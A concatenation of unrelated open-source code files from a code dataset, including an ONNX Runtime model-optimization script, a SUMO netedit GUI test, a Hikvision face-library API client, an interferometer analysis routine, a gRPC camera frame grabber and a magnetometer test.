                pm1 = err_value #0
                dust = err_value #1
                pm10 = err_value #2
                distance = err_value #3
                t1 = err_value #4
                rh = err_value #5
                co2 = err_value #6
        else:
            # empty line -> error sentinels
            print("Line too short")
            print(line)
            pm1 = err_value #0
            dust = err_value #1
            pm10 = err_value #2
            distance = err_value #3
            t1 = err_value #4
            rh = err_value #5
            co2 = err_value #6
        #PACMAN controlled activities
        # Deactivate screensaver when something is close by (1.5m)
        #if (distance<150):
            #os.system("xscreensaver-command -deactivate &") #If something is close by... deactivate the screensaver
        # Update the frame of data for scale (newest sample at index 0;
        # note error sentinels are pushed into the frames as well)
        self.frameCO2 = [co2] + self.frameCO2[:-1]
        self.frameDUST = [pm10] + self.frameDUST[:-1]
        self.frameTEMP = [t1] + self.frameTEMP[:-1]
        # Calculate the max/min for each stream only for valid data lines
        if (pm10>0):
            self.rec_time=time.gmtime()
            self.timestamp = time.strftime("%Y/%m/%d %H:%M:%S GMT",self.rec_time)
            self.maxCO2 = max(self.frameCO2)
            self.minCO2 = min(self.frameCO2)
            self.maxDUST = max(self.frameDUST)
            self.minDUST = min(self.frameDUST)
            self.maxTEMP = max(self.frameTEMP)
            self.minTEMP = min(self.frameTEMP)
            file_line = self.timestamp+','+str(pm1)+','+str(dust)+','+str(pm10)+','+str(distance)+','+str(t1)+','+str(rh)+','+str(co2)
            # We have data so we save it (append to one file per UTC day)
            current_file_name = self.datapath+time.strftime("%Y%m%d.txt",self.rec_time)
            current_file = open(current_file_name,"a")
            current_file.write(file_line+"\n")
            current_file.flush()
            current_file.close()
        # C D E F G A B
        #print(co2)
        # 0 1 2 3 4 5 6 7 8 9 10 11 12
        print(pm1, dust, pm10, distance, t1, rh, co2, self.minCO2, self.maxCO2, self.minDUST, self.maxDUST, self.minTEMP, self.maxTEMP)
        return (pm1, dust, pm10, distance, t1, rh, co2, self.minCO2, self.maxCO2, self.minDUST, self.maxDUST, self.minTEMP, self.maxTEMP)
| StarcoderdataPython |
8099545 | #!/usr/bin/env python
# coding=utf-8
# Copyright The HuggingFace Team and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for multiple choice.
"""
# You can also adapt this script on your own multiple choice task. Pointers for this are left as comments.
import json
import logging
import os
import sys
from dataclasses import dataclass, field
from functools import partial
from itertools import chain
from typing import Optional, Union
import datasets
import numpy as np
import torch
import transformers
from datasets import load_dataset
from transformers import HfArgumentParser, TrainingArguments
from transformers.tokenization_utils_base import PreTrainedTokenizerBase
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from optimum.onnxruntime import ORTModel, ORTOptimizer
from optimum.onnxruntime.configuration import OptimizationConfig, ORTConfig
# Will error if the minimal version of Transformers is not installed. The version of transformers must be >= 4.19.0
# as the export to onnx of multiple choice topologies was added in this release. Remove at your own risks.
check_min_version("4.19.0")
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
    """

    # Required: hub identifier or local path of the model to export/optimize.
    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
    )
    # Optional overrides when the config/tokenizer live elsewhere than the model.
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    use_fast_tokenizer: bool = field(
        default=True,
        metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    # Needed to download private models from the hub.
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
            "with private models)."
        },
    )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.

    When neither train_file nor validation_file is given, main() falls back to
    the SWAG dataset from the hub.
    """

    train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )
    max_seq_length: Optional[int] = field(
        default=1024,
        metadata={
            "help": "The maximum total input sequence length after tokenization. If passed, sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
            "value if set."
        },
    )

    def __post_init__(self):
        # Validate the data-file extensions (only csv/json are supported by
        # datasets.load_dataset as used in main()).
        # NOTE(review): assert is stripped under `python -O`; raising
        # ValueError would be more robust input validation.
        if self.train_file is not None:
            extension = self.train_file.split(".")[-1]
            assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
        if self.validation_file is not None:
            extension = self.validation_file.split(".")[-1]
            assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
@dataclass
class OptimizationArguments:
    """
    Arguments pertaining to what type of optimization we are going to apply on the model.

    Note: execution_provider is declared on THIS dataclass (read via the
    `optim_args` instance in main()).
    """

    opset: Optional[int] = field(
        default=None,
        metadata={"help": "ONNX opset version to export the model with."},
    )
    optimization_level: Optional[int] = field(
        default=1,
        metadata={
            "help": "Optimization level performed by ONNX Runtime of the loaded graph."
            "0 will disable all optimizations."
            "1 will enable basic optimizations."
            "2 will enable basic and extended optimizations, including complex node fusions applied to the nodes "
            "assigned to the CPU or CUDA execution provider, making the resulting optimized graph hardware dependent."
            "99 will enable all available optimizations including layout optimizations."
        },
    )
    optimize_with_onnxruntime_only: bool = field(
        default=False,
        metadata={
            "help": "Whether to only use ONNX Runtime to optimize the model and no graph fusion in Python."
            "Graph fusion might require offline, Python scripts, to be run."
        },
    )
    optimize_for_gpu: bool = field(
        default=False,
        metadata={
            "help": "Whether to optimize the model for GPU inference. The optimized graph might contain operators for "
            "GPU or CPU only when optimization_level > 1."
        },
    )
    execution_provider: str = field(
        default="CPUExecutionProvider",
        metadata={"help": "ONNX Runtime execution provider to use for inference."},
    )
def main():
    """Export a multiple-choice model to ONNX, optimize it with ONNX Runtime,
    and (with --do_eval) evaluate the optimized graph on SWAG or user data."""
    # We now keep distinct sets of args, for a cleaner separation of concerns.
    parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments, OptimizationArguments))
    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
        # If we pass only one argument to the script and it's the path to a json file,
        # let's parse it to get our arguments.
        model_args, data_args, training_args, optim_args = parser.parse_json_file(
            json_file=os.path.abspath(sys.argv[1])
        )
    else:
        model_args, data_args, training_args, optim_args = parser.parse_args_into_dataclasses()

    # Setup logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        handlers=[logging.StreamHandler(sys.stdout)],
    )
    log_level = training_args.get_process_log_level()
    logger.setLevel(log_level)
    datasets.utils.logging.set_verbosity(log_level)
    transformers.utils.logging.set_verbosity(log_level)
    transformers.utils.logging.enable_default_handler()
    transformers.utils.logging.enable_explicit_format()

    # Sanity-check the provider/optimization combination.
    # BUG FIX: execution_provider is declared on OptimizationArguments, so it
    # must be read from optim_args -- the previous model_args.execution_provider
    # raised AttributeError whenever optimization_level > 1.
    if (
        optim_args.optimization_level > 1
        and optim_args.optimize_for_gpu
        and optim_args.execution_provider == "CPUExecutionProvider"
    ):
        raise ValueError(
            f"Optimization level is set at {optim_args.optimization_level} and "
            f"GPU optimization will be done, although the CPU execution provider "
            f"was selected. Use --execution_provider CUDAExecutionProvider."
        )
    if (
        optim_args.optimization_level > 1
        and not optim_args.optimize_for_gpu
        and optim_args.execution_provider == "CUDAExecutionProvider"
    ):
        raise ValueError(
            f"Optimization level is set at {optim_args.optimization_level} and "
            f"CPU optimization will be done, although the GPU execution provider "
            f"was selected. Remove the argument --execution_provider CUDAExecutionProvider."
        )

    logger.info(f"Optimization with the following parameters {optim_args}")

    # NOTE(review): this rejects any existing output dir, empty or not,
    # despite the message mentioning emptiness.
    if os.path.isdir(training_args.output_dir) and not training_args.overwrite_output_dir:
        raise ValueError(
            f"Output directory ({training_args.output_dir}) already exists and is not empty. "
            "Use --overwrite_output_dir to overcome."
        )

    os.makedirs(training_args.output_dir, exist_ok=True)
    model_path = os.path.join(training_args.output_dir, "model.onnx")
    optimized_model_path = os.path.join(training_args.output_dir, "model-optimized.onnx")

    # Create the optimization configuration containing all the optimization parameters
    optimization_config = OptimizationConfig(
        optimization_level=optim_args.optimization_level,
        optimize_with_onnxruntime_only=optim_args.optimize_with_onnxruntime_only,
        optimize_for_gpu=optim_args.optimize_for_gpu,
    )

    # Create the optimizer
    optimizer = ORTOptimizer.from_pretrained(
        model_args.model_name_or_path, feature="multiple-choice", opset=optim_args.opset
    )

    # Export the optimized model
    optimizer.export(
        onnx_model_path=model_path,
        onnx_optimized_model_output_path=optimized_model_path,
        optimization_config=optimization_config,
    )

    # Create the ONNX Runtime configuration summarizing all the parameters related to ONNX IR export and optimization
    ort_config = ORTConfig(opset=optimizer.opset, optimization=optimization_config)
    # Save the configuration
    ort_config.save_pretrained(training_args.output_dir)

    if training_args.do_eval:
        # Prepare the dataset downloading, preprocessing and metric creation to perform the evaluation and / or the
        # prediction step(s)
        if data_args.train_file is not None or data_args.validation_file is not None:
            data_files = {}
            if data_args.train_file is not None:
                data_files["train"] = data_args.train_file
            if data_args.validation_file is not None:
                data_files["validation"] = data_args.validation_file
            extension = data_args.train_file.split(".")[-1]
            raw_datasets = load_dataset(
                extension,
                data_files=data_files,
                cache_dir=model_args.cache_dir,
                use_auth_token=True if model_args.use_auth_token else None,
            )
        else:
            # Downloading and loading the swag dataset from the hub.
            raw_datasets = load_dataset(
                "swag",
                "regular",
                cache_dir=model_args.cache_dir,
                use_auth_token=True if model_args.use_auth_token else None,
            )
        if "validation" not in raw_datasets:
            raise ValueError("--do_eval requires a validation dataset")
        eval_dataset = raw_datasets["validation"]
        if data_args.max_eval_samples is not None:
            max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
            eval_dataset = eval_dataset.select(range(max_eval_samples))

        # When using your own dataset or a different dataset from swag, you will probably need to change this.
        ending_names = [f"ending{i}" for i in range(4)]
        context_name = "sent1"
        question_header_name = "sent2"

        # Preprocessing the datasets: pair each context with its four candidate
        # endings, tokenize flat, then regroup per example.
        def preprocess_function(examples, tokenizer: PreTrainedTokenizerBase):
            first_sentences = [[context] * 4 for context in examples[context_name]]
            question_headers = examples[question_header_name]
            second_sentences = [
                [f"{header} {examples[end][i]}" for end in ending_names] for i, header in enumerate(question_headers)
            ]
            # Flatten out
            first_sentences = list(chain(*first_sentences))
            second_sentences = list(chain(*second_sentences))
            # Tokenize
            tokenized_examples = tokenizer(
                first_sentences,
                second_sentences,
                truncation=True,
                max_length=min(data_args.max_seq_length, tokenizer.model_max_length),
                padding="max_length",
            )
            # Un-flatten
            return {k: [v[i : i + 4] for i in range(0, len(v), 4)] for k, v in tokenized_examples.items()}

        # Preprocess the evaluation dataset
        with training_args.main_process_first(desc="Running tokenizer on the validation dataset"):
            eval_dataset = eval_dataset.map(
                partial(preprocess_function, tokenizer=optimizer.tokenizer),
                batched=True,
                num_proc=data_args.preprocessing_num_workers,
                load_from_cache_file=not data_args.overwrite_cache,
            )

        # Metric: simple accuracy over the argmax of the four choice logits.
        def compute_metrics(eval_predictions):
            predictions, label_ids = eval_predictions
            preds = np.argmax(predictions, axis=1)
            return {"accuracy": (preds == label_ids).astype(np.float32).mean().item()}

        # Evaluation
        logger.info("*** Evaluate ***")
        ort_model = ORTModel(
            optimized_model_path,
            optimizer._onnx_config,
            execution_provider=optim_args.execution_provider,
            compute_metrics=compute_metrics,
            label_names=["label"],
        )
        outputs = ort_model.evaluation_loop(eval_dataset)
        # Save evaluation metrics
        with open(os.path.join(training_args.output_dir, "eval_results.json"), "w") as f:
            json.dump(outputs.metrics, f, indent=4, sort_keys=True)
def _mp_fn(index):
    """Per-process entry point used by xla_spawn on TPUs; `index` is the
    process ordinal (unused here)."""
    # For xla_spawn (TPUs)
    main()


# Standard script entry point.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
3369083 | <reponame>iltempe/osmosi<filename>sumo/tests/netedit/bugs/ticket2948/test.sikuli/test.py
#!/usr/bin/env python
"""
@file test.py
@author <NAME>
@date 2016-11-25
@version $Id$
python script used by sikulix for testing netedit
SUMO, Simulation of Urban MObility; see http://sumo.dlr.de/
Copyright (C) 2009-2017 DLR/TS, Germany
This file is part of SUMO.
SUMO is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
"""
# import common functions for netedit tests
import os
import sys
testRoot = os.path.join(os.environ.get('SUMO_HOME', '.'), 'tests')
neteditTestRoot = os.path.join(
os.environ.get('TEXTTEST_HOME', testRoot), 'netedit')
sys.path.append(neteditTestRoot)
import neteditTestFunctions as netedit # noqa
# Open netedit
neteditProcess, match = netedit.setupAndStart(neteditTestRoot, ['--new'])
# Change to create edge mode
netedit.createEdgeMode()
# select two-way mode
netedit.changeTwoWayOption()
# select chain mode
netedit.changeChainOption()
# create a circular road
netedit.leftClick(match, 300, 150)
netedit.leftClick(match, 400, 150)
netedit.leftClick(match, 400, 250)
netedit.leftClick(match, 400, 350)
netedit.leftClick(match, 300, 350)
netedit.leftClick(match, 200, 350)
netedit.leftClick(match, 200, 250)
netedit.cancelEdge()
# go to select mode
netedit.selectMode()
# select all elements using invert operation
netedit.selectionInvert()
# go to inspect mode
netedit.inspectMode()
# inspect set of junctions
netedit.leftClick(match, 400, 150)
# Set all Junctions as traffic lighs
netedit.modifyAttribute(0, "traffic_light")
# inspect set of edges
netedit.leftClick(match, 450, 150)
# change all speed of edges
netedit.modifyAttribute(0, "20")
# rebuild network
netedit.rebuildNetwork()
# Check undo and redo
netedit.undo(match, 8)
netedit.redo(match, 8)
# save newtork
netedit.saveNetwork()
# quit netedit
netedit.quit(neteditProcess)
| StarcoderdataPython |
4986240 | from . import auth
import requests
import json
from types import SimpleNamespace
class FaceDataLib(object):
def fp_library_add(self, faceLibType, name, customInfo, host):
path = host+'/ISAPI/Intelligent/FDLib?format=json'
body = {
'faceLibType': faceLibType,
'name': name,
'customInfo': customInfo
}
response = requests.post(path, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def fp_library_update(self, fdid, faceLibType, name, customInfo, host):
path = f'{host}/ISAPI/Intelligent/FDLib?format=json&FDID={fdid}&faceLibType={faceLibType}'
body = {
"name": "CustomTestLibraryBlackFD",
"customInfo": "test libraryBlackFD"
}
response = requests.put(path, data=json.dumps(body), auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def fp_library_delete(self, fdid, faceLibType, host):
path = f'{host}/ISAPI/Intelligent/FDLib?format=json&FDID={fdid}&faceLibType={faceLibType}'
response = requests.delete(path, auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
def fp_library_list(self, host):
path = '{host}/ISAPI/Intelligent/FDLib?format=json'
response = requests.get(path, auth=auth)
result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
return result
class FaceData(object):
    """Thin client for the Hikvision ISAPI face-data (FDLib) record endpoints.

    Every method issues an HTTP request authenticated with the module-level
    ``auth`` object and returns the JSON reply parsed into nested
    ``SimpleNamespace`` objects for attribute-style access.
    """
    def face_data_add(self, faceLibType, FDID, FPID, name, gender, bornTime, city, faceURL, host1, host2):
        """Add one face record to the same library on two devices.

        NOTE(review): only ``host1``'s response is parsed and returned;
        ``response2`` is ignored, so failures on ``host2`` pass silently --
        confirm this is intended.
        """
        path1 = host1+'/ISAPI/Intelligent/FDLib/FaceDataRecord?format=json'
        path2 = host2+'/ISAPI/Intelligent/FDLib/FaceDataRecord?format=json'
        body = {
            "faceLibType": faceLibType,
            "FDID": str(FDID),
            "FPID": str(FPID),
            "name": name,
            "gender": gender,
            "bornTime": bornTime, #"19940226T000000+0500"
            "city": city,
            "faceURL": faceURL
        }
        response = requests.post(path1, data=json.dumps(body), auth=auth)
        response2 = requests.post(path2, data=json.dumps(body), auth=auth)
        result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
        return result
    def face_data_update(self, faceLibType, FDID, FPID, name, gender, bornTime, city, faceURL, host1, host2):
        """Update a face record (matched by FDID/FPID) on two devices.

        NOTE(review): as in ``face_data_add``, only ``host1``'s response is
        returned.
        """
        path1 = f'{host1}/ISAPI/Intelligent/FDLib/FDSearch?format=json&FDID={FDID}&FPID={FPID}&faceLibType={faceLibType}'
        path2 = f'{host2}/ISAPI/Intelligent/FDLib/FDSearch?format=json&FDID={FDID}&FPID={FPID}&faceLibType={faceLibType}'
        body = {
            "name": name,
            "gender": gender,
            "bornTime": bornTime, #"19940226T000000+0500"
            "city": city,
            "faceURL": faceURL
        }
        response = requests.put(path1, data=json.dumps(body), auth=auth)
        response2 = requests.put(path2, data=json.dumps(body), auth=auth)
        result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
        return result
    def face_data_delete(self, faceLibType, FDID, FPIDList, host):
        """Delete all face records listed in ``FPIDList`` from one library."""
        path = f'{host}/ISAPI/Intelligent/FDLib/FDSearch/Delete?format=json&FDID={FDID}&faceLibType={faceLibType}'
        # The endpoint expects the FPIDs wrapped as [{'value': fpid}, ...].
        fpidlist = []
        for fpid in FPIDList:
            fpidlist.append({
                'value': fpid
            })
        body = {
            'FPID': fpidlist
        }
        response = requests.put(path, data=json.dumps(body), auth=auth)
        result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
        return result
    def face_data_search(self, faceLibType, FDID, FPID, host):
        """Search one library for a face record; returns at most 32 results."""
        path = f'{host}/ISAPI/Intelligent/FDLib/FDSearch?format=json'
        body = {
            "searchResultPosition": 0,
            "maxResults": 32,
            "faceLibType": f'{faceLibType}',
            "FDID": f'{FDID}',
            "FPID": f'{FPID}'
        }
        response = requests.post(path, data=json.dumps(body), auth=auth)
        result = json.loads(json.dumps(response.json()), object_hook=lambda d: SimpleNamespace(**d))
        return result
199418 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 29 12:59:04 2020
@author: hartwgj
"""
# cth 1mm interferometer code
import scipy.constants
from scipy import fft,ifft
from cthmds import CTHData
import numpy as np
# input the chord
# return the density and time axis
# other possible keywords: numfwin, phase,SAVEintfrm_1mm,eflag, verbose
#def CTHintfrm_1mm(shotnum,chord,debug):
def CTHintfrm_1mm(sawsig,intsig,chord,debug): # use when testing
    """Phase/density analysis for one chord of the CTH 1 mm interferometer.

    Only the FFT of the sawtooth reference and the location of its
    sweep-frequency peak are implemented so far; the frequency windowing,
    inverse transform, fringe correction and density calculation remain as
    commented-out IDL below, awaiting translation.  No value is returned yet.

    Assumed inputs (TODO confirm against caller):
        sawsig, intsig : CTHData-like objects exposing a ``.data`` array
        chord          : 1-based chord index (selects frequency and channels)
        debug          : when True, print diagnostics
    """
    # --------------------- Define constants ---------------------
    pi=scipy.constants.pi
    c = scipy.constants.c # [m/s] speed of light, !const.c
    me = scipy.constants.m_e # [kg] electron mass, !const.me
    ep0 = scipy.constants.epsilon_0 # [C^2/Nm^2] permitivity of free space, !const.eps0
    e = scipy.constants.e # [C] fundamental charge, !const.e
    # these are system dependent
    freq=[244.0E9, 244.0E9, 244.0E9, 280.0E9] # chord frequencies
    w0 = 2.0*pi * np.array(freq) # [Hz] nominal frequency of output
    lp = 2.0 * 0.25 #[m] closer to the flux surface width in ECRH plasmas
    dt=1.0/50E6 # 50MHz digitization rate
    sweepfreq=450000 # 450kHz sweep frequency
    hanning_width=70000 # window width of hanning window
    # define data board and channel pairs
    sawtooth_ch=[(5,1),(5,1),(5,1),(6,2)]
    data_ch = [(5,2),(5,3),(5,4),(6,3)]
    # ------------------------- Get data -------------------------
    # (disabled while testing: the signals are passed in as arguments)
    # if debug: print(' Getting interferometer data...')
    # intsig=CTHData('intgis')
    # sawsig=CTHData('intsaw')
    # sawsig.get_data(server='neil',shotnum=shotnum,board_channel=sawtooth_ch[chord-1])
    # intsig.get_data(server='neil',shotnum=shotnum,board_channel=data_ch[chord-1])
    if debug:
        print('')
        print(' data retrieved, starting phase calculation... ')
        length=len(intsig.data)
        print('data length ',length)
        signal_strength=max(intsig.data[0:5000]) - min(intsig.data[0:5000])
        print('chord ',chord,' signal strength ' ,signal_strength)
    # NOTE(review): ``length`` is assigned only on the debug path but is used
    # unconditionally below (faxis/maxsfft) -- confirm debug is always True,
    # or hoist the assignment out of the if-block.
    # ; Truncate for efficiency 2^23=8388608 which should speed up calculations
    # that would go from 1.55s to 1.68 which is not long enough
    #
    # ;intfrm1 = temporary(intfrm1[0:numt-1])
    # ;intfrm2 = temporary(intfrm2[0:numt-1])
    # ;intfrm3 = temporary(intfrm3[0:numt-1])
    # ;sawtooth = temporary(sawtooth[0:numt-1])
    # ;t_intfrm = temporary(t_intfrm[0:numt-1])
    # ; experimental code, not in use.
    # if 0 then begin
    # tdisrupt = 1.66
    # ntdisrupt = max(where(t_intfrm le tdisrupt))
    # print,ntdisrupt
    # nt = 5500000
    # numt = long(2)^22
    # intfrm = intfrm[0:nt-1,*]
    # sawtooth = temporary(sawtooth[0:nt-1])
    # t_intfrm = temporary(t_intfrm[0:nt-1])
    # ;if ntdisrupt le numt then stop
    # ; intfrm = intfrm[ntdisrupt-numt+1:ntdisrupt,*]
    # ; sawtooth = temporary(sawtooth[ntdisrupt-numt+1:ntdisrupt])
    # ; t_intfrm = temporary(t_intfrm[ntdisrupt-numt+1:ntdisrupt])
    # endif
    # Compute fft of signals
    numt=len(sawsig.data)
    sawfft = np.fft.fft(sawsig.data)
    # faxis = [findgen(numt/2+1),-reverse(findgen(round(numt/2.0)-1)+1)] /(numt*dt)
    # Positive-frequency axis up to the Nyquist frequency 1/(2*dt).
    faxis=np.linspace(0.0,1.0/(2.0*dt),length//2)
    # Initial guesses; both values are recomputed below.
    nfmax=int(sweepfreq/5.0)
    numfwin=int(hanning_width/5.0)
    abssawfft=np.abs(sawfft)
    # Locate the sweep-frequency peak in the reference spectrum (skip DC bin 0).
    maxsfft=np.max(abssawfft[1:length//2])
    nfmax = np.where(abssawfft==maxsfft)[0][0]
    if debug: print('nfmax = ',nfmax,' at f= ',faxis[nfmax])
    # nfmax=90000
    # ; numfwin sets the frequency window width used
    # ; I'm not sure what the optimal value is, and it probably depends on the
    # ; interferometer chirp frequency (i.e. sawtooth frequency)
    numfwin=hanning_width//5
    # ; Apply frequency window. Set usehanning = 1 to use a hanning window,
    # ; otherwise a top hat window will be used
    # usehanning=1
    # if keyword_set(usehanning) then begin
    # hwin = hanning(2L*numfwin+1)
    # for ii=0,numchord-1 do begin
    # sigfft[nfmax-numfwin:nfmax+numfwin,ii] = hwin*sigfft[nfmax-numfwin:nfmax+numfwin,ii]
    # endfor
    # sigfft[0:nfmax-numfwin-1,*] = 0.0
    # sigfft[nfmax+numfwin+1:*,*] = 0.0
    # endif else begin
    # ; Zero out all but frequencies within numfwin of nfmax
    # sigfft[0:nfmax-numfwin,*] = 0.0
    # sigfft[nfmax+numfwin:*,*] = 0.0
    # endelse
    # ; Do inverse transform for all chords
    # sig = fft(sigfft,/inverse,dimension=1)
    # ; Create cleaner reference signal from fft of sawtooth
    # reffft = sawfft
    # if keyword_set(usehanning) then begin
    # hwin = hanning(2L*numfwin+1)
    # reffft[nfmax-numfwin:nfmax+numfwin] = hwin*reffft[nfmax-numfwin:nfmax+numfwin]
    # reffft[0:nfmax-numfwin-1,*] = 0.0
    # reffft[nfmax+numfwin+1:*,*] = 0.0
    # endif else begin
    # reffft[0:nfmax-numfwin] = 0.0
    # reffft[nfmax+numfwin:*] = 0.0
    # endelse
    # for ii=0,numchord-1 do begin
    # if ii eq 0 then ref = fft(reffft,/inverse) else $
    # ref = [[ref],[ref]]
    # endfor
    # ; Calculate phase difference between signals and reference
    # phs = atan(sig*conj(ref),/phase)
    # ; --------------------- Correct phase -------------------------
    # phs = cthfringecounter(phs)
    # ; Subtract offset and thin the data
    # noffset = where( (t_intfrm ge 1.56) and (t_intfrm le 1.58) )
    # for ii=0,numchord-1 do begin
    # if ii eq 0 then phase = thinn(phs[*,ii] - mean(phs[noffset,ii]),9) else $
    # phase = [[phase],[thinn(phs[*,ii] - mean(phs[noffset,ii]),9)]]
    # endfor
    # t_intfrm = thinn(t_intfrm,9)
    # if n_elements(t_intfrm) ne n_elements(phase[*,0]) then $
    # message,'processed data and time axis not of same length!'
    # ; --------- Calculate density --------
    # ;est_density = -(2.0 * !const.me * !const.eps0 * !const.c * w0 * phase) / (!const.e^2.0 * lp)
    # est_density = -(2.0 * me * ep0 * c * w0 * phase) / (e^2.0 * lp)
    # t0 = t_intfrm[0]
    # tf = max(t_intfrm)
    # ;dt = (tf - t0)/(numt - 1)
    # taxis = t_intfrm
    # dt = (tf - t0)/(n_elements(taxis)-1)
    # if max(SAVEintfrm_1mm) eq 1 then begin
    # print,' Saving data...'
    # for ii=0,numchord-1 do begin
    # if SAVEintfrm_1mm[ii] eq 1 then $
    # mdsput,'processed:intfrm_1mm:phs_'+strtrim(chord[ii],2), $
    # 'BUILD_SIGNAL( $,*,build_range($,$,$))',phase[*,ii],t0,tf,dt
    # endfor
    # mdsput,'processed:intfrm_1mm:t0','$',t0
    # mdsput,'processed:intfrm_1mm:dt','$',dt
    # endif
    # if keyword_set(stp) then begin
    # print, 'cthintfrm_1mm.pro stopped for debugging at ', $
    # systime(0)
    # stop
    # endif
    # ; end of cthintfrm_1mm
| StarcoderdataPython |
3580149 | from threading import Thread, Lock
import time
import video_streaming_pb2,video_streaming_pb2_grpc
import numpy as np
import cv2
import imutils
class Camera(Thread):
    """Background thread that mirrors the latest JPEG frame of every camera
    exposed by a Chrysalis edge-proxy gRPC video-streaming service.
    """
    def __init__(self, channel) -> None:
        """ init thread and connect to chrys edge proxy grpc server """
        Thread.__init__(self)
        self.grpc_stub = video_streaming_pb2_grpc.ImageStub(channel)
        self.cameras_frame = {} # current frame from specific camera stored
    def gen_image_request(self, device_name, keyframe_only=False) -> video_streaming_pb2.VideoFrameRequest:
        """ Create an object to request a video frame """
        req = video_streaming_pb2.VideoFrameRequest()
        req.device_id = device_name
        req.key_frame_only = keyframe_only
        return req
    def gen_list_stream_request(self):
        """ Create a list of streams request object """
        # Generator: yields one response per stream advertised by the proxy.
        stream_request = video_streaming_pb2.ListStreamRequest()
        responses = self.grpc_stub.ListStreams(stream_request)
        for stream_resp in responses:
            yield stream_resp
    def get_frame(self, camera_name):
        """ Store the latest frame from specific camera into a dictionary """
        # Returns the cached JPEG bytes for ``camera_name`` (None if unknown
        # or no frame has been received yet).
        if camera_name in self.cameras_frame:
            jpg = self.cameras_frame[camera_name]
            return jpg
        return None
    def get_camera_list(self):
        # Names of all cameras discovered when the thread started.
        return list(self.cameras_frame.keys())
    def run(self):
        """ use grpc_stub to continously request frames """
        # Discover cameras once, then poll each one forever (~1 s period).
        cam_list_request = self.gen_list_stream_request()
        for cam in cam_list_request:
            cam_name = cam.name
            self.cameras_frame[cam_name] = None
            print("found camera: ---> ", cam)
        while True:
            for cam_name in list(self.cameras_frame.keys()):
                try:
                    req = self.gen_image_request(device_name=cam_name,keyframe_only=True)
                    frame = self.grpc_stub.VideoLatestImage(req)
                    if frame:
                        # read raw frame data and convert to numpy array
                        img_bytes = frame.data
                        re_img = np.frombuffer(img_bytes, dtype=np.uint8)
                        # reshape image back into original dimensions
                        if len(frame.shape.dim) > 0:
                            reshape = tuple([int(dim.size) for dim in frame.shape.dim])
                            re_img = np.reshape(re_img, reshape)
                        re_img = imutils.resize(re_img, width=960)
                        tmp=cv2.imencode('.jpg',re_img) #this returns a tuple.
                        jpg_frame=tmp[1].tobytes() #bytes containing compressed JPEG image
                        self.cameras_frame[cam_name] = jpg_frame
                        print("current frame added to ", cam_name, frame.dts, len(jpg_frame))
                        jpg_frame = None
                except Exception as ex:
                    # Broad catch keeps the poller alive across transient RPC errors.
                    print(ex)
            time.sleep(1)
| StarcoderdataPython |
6409603 | <gh_stars>1000+
"""
Testing qmc5883 python driver
The below i2c configuration is needed in your board.json.
"qmc5883": {
"type": "I2C",
"port": 1,
"addrWidth": 7,
"freq": 400000,
"mode": "master",
"devAddr": 13
}
"""
from qmc5883 import QMC5883
# Smoke test for the qmc5883 magnetometer driver: open the device, init it,
# take four heading readings, then close.
print("Testing qmc5883 ...")
sensor = QMC5883()
sensor.open("qmc5883")
sensor.init()
print("qmc5883 init finished")
for _ in range(4):
    heading = sensor.qmc5883l_readHeading()
    print("heading = %f\n" % heading)
sensor.close()
print("Test qmc5883 success!")
| StarcoderdataPython |
1862457 | #
# Flask-PubSub
#
# Copyright (C) 2017 <NAME>
# All rights reserved
#
